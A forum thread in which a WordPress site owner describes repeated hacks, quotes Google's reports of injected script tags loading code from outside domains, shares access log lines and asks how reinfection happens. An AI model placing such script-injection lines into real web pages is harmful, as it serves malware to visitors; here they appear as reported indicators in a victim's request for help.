tomasv

Hi, how did you resolved the issue?

I am having something very similar happening at my site – the items have embedded JS and the search results are messed up…

Thx.

T.

Yes James, I have run the WP security scan, I have renamed the admin account and in general I have done everything that was in my power – it would be great if someone could offer a more specific guidance on what to look for in the logs in order to determine how they can repeatedly hack this WP installs.

All other WPs on the same VPS are fine…

Hi guys, I really need help – the site was clean for 7 days but it got infected again. From google webmaster:

Suspected injected code Instances
<script type=”text/javascript” src=”https://nuttypiano.com/RA
DCAB.js”

I have changed the ftp password, I generated new WP key, I have the log file and it shows just bunch of access from free mail accounts and some office live URl but I don’t think any of them are harmfull:

67.239.140.16 – – [25/Aug/2010:23:13:35 -0500] “GET /minuet71.jpg HTTP/1.1” 200 270 “https://md29.embarq.synacor.com/zimbra/mail&#8221; “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 2.8)”

114.48.96.54 – – [25/Aug/2010:22:32:45 -0500] “GET /minuet71.jpg HTTP/1.1” 200 270 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; GTB6.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; OfficeLiveConnector.1.5; OfficeLivePatch.1.3)”

Is there anythign specific I need to look for?

Thx!

T.

Yes, I have scanned all local machines with NOD32

I have changed passwords and checked file perms after the restore – all looked good

I have looked at log files – no sign of ftp access

so that makes me believe the issue is in the plugins or wp itself

Google listed this info:

Suspected injected code Instances – 1
<script src=https://amd-creations.com/xmlnuke/matiere.php >

I am on a VPS and other sites using wordpress are intact…

james, I am calm – it’s just that I did follow the guide on Sunday and today I found they hacked it again, this time distributing different malware. Google already blacklisted the site so I just want to make sure this doesn’t repeat itself again.

One question – I used backup XML to get all of the posts back – can that contain a backdoor or infection?

Thx.